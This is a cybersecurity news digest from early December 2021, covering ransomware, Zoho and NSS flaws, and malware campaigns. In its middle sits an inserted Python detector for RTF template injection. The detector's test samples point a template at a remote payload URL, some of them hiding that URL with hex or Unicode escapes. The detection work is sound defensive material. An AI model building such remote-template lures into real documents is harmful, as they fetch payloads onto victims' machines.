Abstract Business software provider Zoho urged customers today to update their Desktop Central and Desktop Central MSP installations to the latest available version.

BleepingComputer

December 2, 2021 – General

‘Double-Extortion’ Ransomware Damage Skyrockets 935% Full Text

Abstract Startling triple-digit growth is fueled by easy criminal access to corporate networks and RaaS tools, an analysis found.

Threatpost

December 2, 2021 – Breach

Planned Parenthood Breach Opens Patients to Follow-On Attacks Full Text

Abstract Cyberattackers made off with addresses, insurance information, dates of birth, and most worryingly, clinical information, such as diagnosis, procedures, and/or prescription information.

Threatpost

December 2, 2021 – Botnet

AT&T Takes Steps to Mitigate Botnet Found Inside Its Network  Full Text

Abstract AT&T is battling a modular malware called EwDoor on 5,700 VoIP servers, but it could have a larger wildcard certificate problem.

Threatpost

December 02, 2021 – Government

CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability Full Text

Abstract The U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities. Tracked as CVE-2021-44077 (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, "allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files," CISA said. "A security misconfiguration in ServiceDesk Plus led to the vulnerability," Zoho noted in an independent advisory published on November 22. "This vulnerability can allow an adversary to execute arbitrary code

The Hacker News

December 02, 2021 – Phishing

Phishing actors start exploiting the Omicron COVID-19 variant Full Text

Abstract Phishing actors have quickly started to exploit the emergence of the Omicron COVID-19 variant and now use it as a lure in their malicious email campaigns.

BleepingComputer

December 2, 2021 – Malware

Bogus Android App Steals Banking Credentials from Malaysian Individuals Full Text

Abstract Initially noticed by MalwareHunterTeam and later analyzed by security experts at Cyblis, this application is promoted via numerous bogus or copied websites and social media accounts in order to advertise the malicious APK ‘Cleaning Service Malaysia.’

Heimdal Security

December 02, 2021 – Government

Federal watchdog warns security of US infrastructure ‘in jeopardy’ without action Full Text

Abstract A federal watchdog agency on Thursday released findings highlighting serious concerns around cybersecurity vulnerabilities in U.S. critical infrastructure, warning that these systems are “in jeopardy” if the government fails to take action.

The Hill

December 02, 2021 – Solution

Meta Expands Facebook Protect Program to Activists, Journalists, Government Officials Full Text

Abstract Meta, the company formerly known as Facebook, on Thursday announced an expansion of its Facebook Protect security program to include human rights defenders, activists, journalists, and government officials who are more likely to be targeted by bad actors across its social media platforms. "These people are at the center of critical communities for public debate," said Nathaniel Gleicher, head of security policy at Meta. "They enable democratic elections, hold governments and organizations accountable, and defend human rights around the world. Unfortunately this also means that they are highly targeted by bad actors." Facebook Protect, currently being launched globally in phases, enables users who enroll for the initiative to adopt stronger account security protections, like two-factor authentication (2FA), and watch out for potential hacking threats. Meta said more than 1.5 million accounts have enabled Facebook Protect to date, of which nearly 950,000 account

The Hacker News

December 2, 2021 – Government

CISA adds Zoho, Apache, Qualcomm, Mikrotik flaws to the list of actively exploited issues Full Text

Abstract U.S. CISA urges organizations to address actively exploited vulnerabilities in Qualcomm, MikroTik, Zoho and Apache Software Foundation software. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its catalog of actively exploited vulnerabilities, recommending...

Security Affairs

December 02, 2021 – Government

Twitter removes 3,400 accounts used in govt propaganda campaigns Full Text

Abstract Twitter today announced the permanent removal of more than 3,400 accounts linked to governments of six countries running manipulation or spam campaigns.

BleepingComputer

December 2, 2021 – Malware

NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text

Abstract Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers to evade security solutions. It was found by researchers at Sansec, the security firm that recently discovered CronRAT, a Linux remote access trojan that hides in the Linux task scheduling system (cron) as an entry dated February 31st.

Security Affairs

December 02, 2021 – Government

TSA issues directives to rail sector to strengthen cybersecurity Full Text

Abstract The Transportation Security Administration (TSA) on Thursday issued two security directives requiring rail and rail transit groups to implement steps to strengthen cybersecurity of the sector, including a requirement to report cyber incidents to the federal government.

The Hill

December 02, 2021 – Malware

Researchers Detail 17 Malicious Frameworks Used to Attack Air-Gapped Networks Full Text

Abstract Four different malicious frameworks designed to attack air-gapped networks were detected in the first half of 2020 alone, bringing the total number of such toolkits to 17 and offering adversaries a pathway to conduct cyber espionage and exfiltrate classified information. "All frameworks are designed to perform some form of espionage, [and] all the frameworks used USB drives as the physical transmission medium to transfer data in and out of the targeted air-gapped networks," ESET researchers Alexis Dorais-Joncas and Facundo Muñoz said in a comprehensive study of the frameworks. Air-gapping is a network security measure designed to prevent unauthorized access to systems by physically isolating them from other, less secure networks, including local area networks and the public internet. This also implies that the only way to transfer data is by connecting a physical device, such as a USB drive or external hard disk. Given that the mechanism is one of the most common ways SCAD

The Hacker News

December 2, 2021 – Privacy

Russian internet watchdog Roskomnadzor bans six more VPN services Full Text

Abstract Russia’s internet watchdog Roskomnadzor has announced a ban on six more VPN products, bringing the number of VPN services now illegal in Russia to 15. The communications watchdog continues to tighten its control over the Internet and has blocked access to six more...

Security Affairs

December 02, 2021 – Hacker

Hackers use in-house Zoho ServiceDesk exploit to drop webshells Full Text

Abstract An advanced persistent threat (APT) group that had been exploiting a flaw in the Zoho ManageEngine ADSelfService Plus software has pivoted to leveraging a different vulnerability in another Zoho product.

BleepingComputer

December 2, 2021 – Malware

Emotet trojan returned after the takedown: detected in Japan Full Text

Abstract Emotet is a trojan that spreads through phishing email campaigns carrying malicious attachments. Once the payload is dropped on the machine, the malware can steal emails and credentials and load follow-on malware such as TrickBot or Qbot, as it did before the takedown.

2-Spyware

December 02, 2021 – Privacy

Facebook taking steps to secure accounts of activists, journalists, officials Full Text

Abstract Facebook on Thursday rolled out a new set of measures designed to further protect accounts more often targeted by hackers, including those of human rights activists, journalists and government officials, among others.

The Hill

December 02, 2021 – Education

Let there be light: Ensuring visibility across the entire API lifecycle Full Text

Abstract The following article is based on a webinar series on enterprise API security by Imvision, featuring expert speakers from IBM, Deloitte, Maersk, and Imvision discussing the importance of centralizing an organization's visibility of its APIs as a way to accelerate remediation efforts and improve the overall security posture. Centralizing security is challenging in today's open ecosystem. When approaching API visibility, the first thing we have to recognize is that today's enterprises actively avoid managing all their APIs through one system. According to IBM's Tony Curcio, Director of Integration Engineering, many of his enterprise customers already work with hybrid architectures that combine classic on-premise infrastructure with SaaS and IaaS across various cloud vendors. These architectures aim to increase resilience and flexibility, but the organizations adopting them are well aware that they complicate centralization efforts.

The Hacker News

December 2, 2021 – Malware

NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text

Abstract Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions. Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT,...

Security Affairs

December 02, 2021 – Vulnerabilities

Nine WiFi routers used by millions were vulnerable to 226 flaws Full Text

Abstract Security researchers analyzed nine popular WiFi routers and found a total of 226 potential vulnerabilities in them, even when running the latest firmware.

BleepingComputer

December 2, 2021 – Malware

Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension Full Text

Abstract Magnat is a set of malware distribution campaigns that started in late 2018 and have mainly targeted Canada, along with the U.S., Australia and some EU countries.

Cisco Talos

December 2, 2021 – Criminals

Europol arrested 1800 money mules as part of an anti-money-laundering operation Full Text

Abstract Europol identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7.

Security Affairs

December 02, 2021 – Malware

New malware hides as legit nginx process on e-commerce servers Full Text

Abstract eCommerce servers are being targeted with remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions.

BleepingComputer

December 2, 2021 – Ransomware

Hospital Ransomware Attacks Go Beyond Health Care Data Full Text

Abstract In a 2021 survey conducted of 597 health delivery organizations (HDOs), 42% had faced two ransomware attacks in the past couple of years. Over a third (36%) attributed those ransomware incidents to a third party.

Security Intelligence

December 2, 2021 – Vulnerabilities

Mozilla fixes critical flaw in Network Security Services (NSS) cryptography library Full Text

Abstract Mozilla has fixed a critical memory corruption issue affecting its cross-platform Network Security Services (NSS) set of cryptography libraries: a heap-based buffer overflow vulnerability tracked as CVE-2021-43527.

Security Affairs

December 2, 2021 – Business

SpeQtral raises $8.3M to develop quantum-secure communication systems Full Text

Abstract The funds will be used to expand SpeQtral’s regional and international presence, establish strategic business partnerships, hire top talent, support the commercial rollout of terrestrial systems, and further develop its satellite-based systems.

Help Net Security

December 2, 2021 – Phishing

How phishing kits are enabling a new legion of pro phishers Full Text

Abstract Malicious emails can be used to reach many targets with relative ease, and criminals can purchase ready-made phishing kits that bundle together everything they need for a lucrative campaign.

Help Net Security

December 1, 2021 – Vulnerabilities

80K Retail WooCommerce Sites Exposed by Plugin XSS Bug Full Text

Abstract The Variation Swatches plugin security flaw lets attackers with low-level permissions tweak important settings on e-commerce sites to inject malicious scripts.

Threatpost

December 1, 2021 – Criminals

Stealthy ‘WIRTE’ Gang Targets Middle Eastern Governments Full Text

Abstract Kaspersky researchers suspect that the cyberattackers may be a subgroup of the politically motivated, Palestine-focused Gaza Cybergang.

Threatpost

December 1, 2021 – Attack

Widespread ‘Smishing’ Campaign Defrauds Iranian Android Users Full Text

Abstract Attackers use socially engineered SMS messages and malware to compromise tens of thousands of devices and drain user bank accounts.

Threatpost

December 01, 2021 – Phishing

Researchers Warn Iranian Users of Widespread SMS Phishing Campaigns Full Text

Abstract Socially engineered SMS messages are being used to install malware on Android devices as part of a widespread phishing campaign that impersonates the Iranian government and social security services to make off with credit card details and steal funds from victims' bank accounts. Unlike other variants of banking malware that rely on overlay attacks to capture sensitive data without the knowledge of the victim, the financially motivated operation uncovered by Check Point Research is designed to trick the targets into handing over their credit card information by sending them a legitimate-looking SMS message that contains a link, which, when clicked, downloads a malware-laced app onto their devices. "The malicious application not only collects the victim's credit card numbers, but also gains access to their 2FA authentication SMS, and turn[s] the victim's device into a bot capable of spreading similar phishing SMS to other potential victims," Check Point resear

The Hacker News

December 01, 2021 – Policy and Law

Russian Man Gets 60 Months Jail for Providing Bulletproof Hosting to Cyber Criminals Full Text

Abstract A Russian national charged with providing bulletproof hosting services for cybercriminals, who used the platform to spread malware and attack U.S. organizations and financial institutions between 2009 and 2015, has received a 60-month prison sentence. 34-year-old Aleksandr Grichishkin, along with Andrei Skvortsov, founded the bulletproof hosting service and rented its infrastructure to criminal clients who used it to distribute a wide range of malware, attempting to cause millions of dollars in losses to U.S. victims. Skvortsov is pending sentencing and faces a maximum penalty of 20 years in prison. Bulletproof hosting operations are similar to regular web hosting, but are a lot more lenient about what can be hosted on their servers. They are known for providing secure hosting for malicious content and activity and assuring anonymity to threat actors. Grichishkin, in May, pleaded guilty to conspiracy to engage in a racketeer-influenced corrupt organization (RICO). Acting as th

The Hacker News

December 01, 2021 – Breach

Planned Parenthood LA discloses data breach after ransomware attack Full Text

Abstract ​Planned Parenthood Los Angeles has disclosed a data breach after suffering a ransomware attack in October that exposed the personal information of approximately 400,000 patients.

BleepingComputer

December 01, 2021 – Vulnerabilities

Critical Bug in Mozilla’s NSS Crypto Library Potentially Affects Several Other Software Full Text

Abstract Mozilla has rolled out fixes to address a critical security weakness in its cross-platform Network Security Services (NSS) cryptographic library that could be potentially exploited by an adversary to crash a vulnerable application and even execute arbitrary code. Tracked as CVE-2021-43527, the flaw affects NSS versions prior to 3.73 or 3.68.1 ESR, and concerns a heap overflow vulnerability when verifying digital signatures such as DSA and RSA-PSS that are encoded using the DER binary format. Credited with reporting the issue is Tavis Ormandy of Google Project Zero, who codenamed it "BigSig." "NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures," Mozilla said in an advisory published Wednesday. "Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted." NSS is a

The Hacker News

December 01, 2021 – Malware

Emotet now spreads via fake Adobe Windows App Installer packages Full Text

Abstract The notorious Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

BleepingComputer

December 1, 2021 – Botnet

TrickBot Again (But With a Twist) Checks Screen Resolution to Avoid Detection Full Text

Abstract The TrickBot gang is once again performing a screen resolution check to identify virtual machines before deploying payloads, trying to stay under the radar with its improved techniques. Experts say it is the first time a gang has used a script in an HTML attachment to check for screen ...

Cyware Alerts - Hacker News

December 01, 2021 – Breach

Data on thousands of Planned Parenthood Los Angeles patients breached Full Text

Abstract Planned Parenthood Los Angeles (PPLA) announced Wednesday that it had been the target of a “cybersecurity incident” that compromised patient information.

The Hill

December 01, 2021 – Botnet

New EwDoor Botnet Targeting Unpatched AT&T Network Edge Devices Full Text

Abstract A newly discovered botnet capable of staging distributed denial-of-service (DDoS) attacks targeted unpatched Ribbon Communications (formerly Edgewater Networks) EdgeMarc appliances belonging to telecom service provider AT&T by exploiting a four-year-old flaw in the network appliances. Chinese tech giant Qihoo 360's Netlab network security division, which detected the botnet first on October 27, 2021, called it EwDoor, noting it observed 5,700 compromised IP addresses located in the U.S. during a brief three-hour window. "So far, the EwDoor in our view has undergone three versions of updates, and its main functions can be summarized into two main categories of DDoS attacks and backdoor," the researchers noted. "Based on the attacked devices are telephone communication related, we presume that its main purpose is DDoS attacks, and gathering of sensitive information, such as call logs." Propagating through a flaw in EdgeMarc devices, EwDoor supports a

The Hacker News

December 1, 2021 – Solution

VirusTotal Collections allows enhancing the sharing of Indicators of Compromise (IoCs) Full Text

Abstract VirusTotal announced VirusTotal Collections, a new service that allows security researchers to share sets of Indicators of Compromise (IoCs).

Security Affairs

December 01, 2021 – Policy and Law

Former Ubiquiti dev charged for trying to extort his employer Full Text

Abstract Nickolas Sharp, a former employee of networking device maker Ubiquiti, was arrested and charged today with data theft and attempting to extort his employer while posing as a whistleblower and an anonymous hacker.

BleepingComputer

December 1, 2021 – Solution

VirusTotal Introduces ‘Collections’ to Simplify IoC Sharing Full Text

Abstract Chronicle-owned VirusTotal this week announced VirusTotal Collections, a new resource aimed at making it easier for security researchers to share Indicators of Compromise (IoCs).

Security Week

December 01, 2021 – Government

House passes bipartisan bills to strengthen networks security, cyber literacy Full Text

Abstract The House on Wednesday passed three bipartisan bills intended to shore up network security and increase cyber literacy across the nation, following a difficult year fraught with several significant cybersecurity attacks. 

The Hill

December 01, 2021 – Hacker

Hackers Increasingly Using RTF Template Injection Technique in Phishing Attacks Full Text

Abstract Three different state-sponsored threat actors aligned with China, India, and Russia have been observed adopting a new method called RTF (Rich Text Format) template injection as part of their phishing campaigns to deliver malware to targeted systems. "RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file," Proofpoint researchers said in a new report shared with The Hacker News. At the heart of the attack is an RTF file containing decoy content that can be manipulated to enable the retrieval of content, including malicious payloads, hosted at an external URL upon opening the RTF file. Specifically, it leverages the RTF template functionality to alter a document's formatting properties using a hex editor by specifying a URL resource instead of an accessible file resource destination from which a remote payload

The Hacker News

December 1, 2021 – APT

New RTF Template Injection technique used by APT groups in recent attacks Full Text

Abstract Nation-state APT groups from China, India, and Russia have been spotted using a novel RTF (rich text format) template injection technique in recent attacks...

Security Affairs
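
The mechanism described in the two items above (a `\*\template` control word whose destination is a URL instead of a local template file) is simple enough to check for in attachments before they reach a user. The script below is an added example, not Proofpoint's code or anything from the articles: it extracts every template destination from an RTF file, decodes RTF hex and Unicode escape sequences (a plain string search for "http" misses a destination written that way), and flags destinations that point off-host. The sample documents, IP addresses and file names are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List

# The RTF template destination: benign files point it at a local .dot/.dotm path or
# leave it out; template injection puts a remote URL here so Word fetches it on open.
TEMPLATE_GROUP = b"{\\*\\template"

# Remote destinations: http(s)/ftp/file URLs and UNC paths.
REMOTE_RE = re.compile(r"^(?:https?|ftp|file)://|^\\\\[^\\]", re.IGNORECASE)

# Constructed samples (not real lure documents). The last two hide the URL behind
# RTF hex (\'hh) and Unicode (\uN?) escapes.
SAMPLES = {
    "plain": rb"{\rtf1\ansi{\fonttbl{\f0\fswiss Helvetica;}}\f0\pard Hello, world.\par}",
    "local_template": rb"{\rtf1\ansi{\*\template C:\\Users\\me\\Templates\\Normal.dotm}\pard Quarterly report\par}",
    "remote_template": rb"{\rtf1\ansi{\*\template http://203.0.113.10/docs/lure.dotm}\pard Please review.\par}",
    "hex_obfuscated": rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://198.51.100.7/t.dotm}\pard Invoice\par}",
    "unicode_obfuscated": rb"{\rtf1\ansi{\*\template \u104?\u116?\u116?\u112?\u115?://203.0.113.99/x}\pard Memo\par}",
}


@dataclass
class Finding:
    destination: str
    remote: bool


def _group_body(data: bytes, start: int) -> bytes:
    """Contents of the RTF group whose '{' is at data[start], honouring nesting and
    backslash escapes, without the enclosing braces."""
    depth = 0
    i = start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            i += 2  # control word or escaped \{ \} \\: the next byte cannot open/close a group
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return data[start + 1:i]
        i += 1
    raise ValueError("unbalanced RTF group")


def decode_destination(body: bytes) -> str:
    """Turn the raw \\*\\template group text into the destination string, resolving
    \\'hh hex escapes, \\uN Unicode escapes (skipping their \\uc1 fallback character)
    and escaped literals, and dropping any other control words."""
    text = re.sub(r"^\\\*\\template ?", "", body.decode("latin-1"))
    out: List[str] = []
    i = 0
    while i < len(text):
        if text[i] != "\\":
            out.append(text[i])
            i += 1
            continue
        rest = text[i:]
        m = re.match(r"\\'([0-9a-fA-F]{2})", rest)
        if m:
            out.append(chr(int(m.group(1), 16)))
            i += m.end()
            continue
        m = re.match(r"\\u(-?\d+) ?", rest)
        if m:
            code = int(m.group(1))
            out.append(chr(code + 65536 if code < 0 else code))
            i += m.end()
            if i < len(text) and text[i] not in "\\{}":
                i += 1  # default \uc1: one fallback character follows the escape
            continue
        if len(rest) > 1 and rest[1] in "\\{}":
            out.append(rest[1])  # escaped literal backslash or brace
            i += 2
            continue
        m = re.match(r"\\[a-zA-Z]+-?\d* ?", rest)
        i += m.end() if m else 1  # unrelated control word: drop it
    return "".join(out).strip()


def scan_rtf(data: bytes) -> List[Finding]:
    """Every template destination in the file, flagged when it points off-host."""
    findings = []
    idx = data.find(TEMPLATE_GROUP)
    while idx != -1:
        dest = decode_destination(_group_body(data, idx))
        findings.append(Finding(dest, bool(REMOTE_RE.search(dest))))
        idx = data.find(TEMPLATE_GROUP, idx + len(TEMPLATE_GROUP))
    return findings


def is_suspicious(data: bytes) -> bool:
    return any(f.remote for f in scan_rtf(data))


if __name__ == "__main__":
    for name, rtf in SAMPLES.items():
        print(f"{name:20s} suspicious={is_suspicious(rtf)} {[f.destination for f in scan_rtf(rtf)]}")
```

Run `scan_rtf` over the bytes of any `.rtf` attachment (and over `.doc`/`.docx` attachments that turn out to start with `{\rtf`, since the technique relies on the RTF content, not the extension). A template destination that is a local path is ordinary; one that resolves to a URL or UNC path is worth quarantining regardless of how the rest of the document looks.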

December 01, 2021 – Criminals

Bulletproof hosting founder imprisoned for helping cybercrime gangs Full Text

Abstract 34-year-old Russian Aleksandr Grichishkin, the founder of a bulletproof hosting service, was sentenced to 60 months in prison for allowing cybercrime gangs to use the platform in attacks targeting US financial institutions between 2008 and 2015.

BleepingComputer

December 1, 2021 – Vulnerabilities

‘Over-permissive’ authentication checks left 190 Australian organizations vulnerable to business email compromise attacks Full Text

Abstract Email authentication checks could be hoodwinked by phishing emails impersonating nearly 200 Australian organizations due to a vulnerability discovered more than two years after its conception.

The Daily Swig

December 01, 2021 – Disinformation

Facebook, Instagram remove accounts linked to Chinese COVID-19 disinformation efforts Full Text

Abstract Meta on Wednesday announced that it had removed hundreds of accounts, pages and groups linked to a Chinese effort to spread disinformation around the United States pressuring the World Health Organization (WHO) to blame the COVID-19 pandemic on China.

The Hill

December 01, 2021 – Cryptocurrency

Hacker Jailed for Stealing Millions of Dollars in Cryptocurrencies by SIM Hijacking Full Text

Abstract A sixth member associated with an international hacking group known as The Community has been sentenced in connection with a multimillion-dollar SIM swapping conspiracy, the U.S. Department of Justice (DoJ) said. Garrett Endicott, 22, from the U.S. state of Missouri, who pleaded guilty to charges of wire fraud and aggravated identity theft following an indictment in 2019, was sentenced to 10 months in prison and ordered to pay an amount totaling $121,549.37 in restitution. SIM swapping, also called SIM hijacking, refers to an identity theft scheme wherein malicious parties persuade phone carriers into porting their victims' cell services to SIM cards under their control, often facilitated by bribing an employee of a mobile phone provider or by contacting the service provider's customer support by posing as the victim and requesting that the phone number be swapped to a SIM card operated by the group. The goal is to leverage the phone numbers as a gateway to hijack dif

The Hacker News

December 1, 2021 – Privacy

FBI training document shows lawful access to multiple encrypted messaging apps Full Text

Abstract Which are the most secure encrypted messaging apps? An FBI document shows what data can be obtained from them. The Record shared an FBI training document that reveals the surveillance capabilities of US law enforcement, detailing which data can be extracted...

Security Affairs

December 01, 2021 – Malware

Malicious Android app steals Malaysian bank credentials, MFA codes Full Text

Abstract A fake Android app is masquerading as a housekeeping service to steal online banking credentials from the customers of eight Malaysian banks.

BleepingComputer

December 1, 2021 – Criminals

European Money Mule Action leads to 1,803 arrests Full Text

Abstract This was the seventh iteration of the European Money Mule Action, or ‘EMMA’, which was established in 2016 on the initiative of Europol, Eurojust, and the European Banking Federation.

Europol

December 01, 2021 – Government

CISA announces members of team providing advice on cybersecurity threats Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday announced the establishment of its Cybersecurity Advisory Committee and the nearly two dozen members who will provide input on efforts to enhance cybersecurity defense priorities. 

The Hill

December 1, 2021 – Ransomware

Sabbath Ransomware target critical infrastructure in the US and Canada Full Text

Abstract A new ransomware group called Sabbath (aka UNC2190) has been targeting critical infrastructure in the United States and Canada since June 2021...

Security Affairs

December 01, 2021 – Vulnerabilities

Mozilla fixes critical bug in cross-platform cryptography library Full Text

Abstract Mozilla has addressed a critical memory corruption vulnerability affecting its cross-platform Network Security Services (NSS) set of cryptography libraries.

BleepingComputer

December 1, 2021 – Vulnerabilities

Use-after-free condition in Google Chrome could lead to code execution Full Text

Abstract The use-after-free vulnerability in Chrome is triggered by opening a specially crafted webpage which could trigger the reuse of previously freed memory, which can lead to arbitrary code execution.

Cisco Talos

December 01, 2021 – Hacker

Hackers targeting and stealing billions from Iranian citizens in texting scheme Full Text

Abstract Financially motivated hackers likely based in Iran are successfully targeting and stealing billions in currency from Iranian civilians through a texting campaign, new research released Wednesday found.

The Hill

December 01, 2021 – Ransomware

Microsoft Exchange servers hacked to deploy BlackByte ransomware Full Text

Abstract BlackByte ransomware actors were observed exploiting the ProxyShell set of vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to compromise Microsoft Exchange servers.

BleepingComputer

December 1, 2021 – Education

Understanding the Adversary: How Ransomware Attacks Happen Full Text

Abstract The most common access vectors for ransomware attacks continue to be phishing, vulnerability exploitation including Exploitation of a Public-Facing Application, and External Remote Services.

Security Intelligence

December 01, 2021 – Solution

VirusTotal Collections feature helps keep neat IoC lists Full Text

Abstract Scanning service VirusTotal announced today a new feature called Collections that lets researchers create and share reports with indicators of compromise observed in security incidents.

BleepingComputer

December 1, 2021 – Criminals

Ottawa’s French public school board paid hackers a ransom following cyberattack Full Text

Abstract Hackers had stolen approximately 75 GB worth of data about employees and some students and parents dating back to 2000 that was stored on a server at the board's main office.

CTV News

December 01, 2021 – Phishing

State-backed hackers increasingly use RTF injection for phishing Full Text

Abstract Three APT hacking groups from India, Russia, and China, were observed using a novel RTF (rich text format) template injection technique in their recent phishing campaigns.

BleepingComputer

December 1, 2021 – Government

CISA Seeks Protective Email Service that Tracks Agencies’ Security Compliance Full Text

Abstract CISA is in the market for a service that can help protect both recipients of government email and the agencies themselves by ensuring that agency email platforms are securely configured.

Nextgov
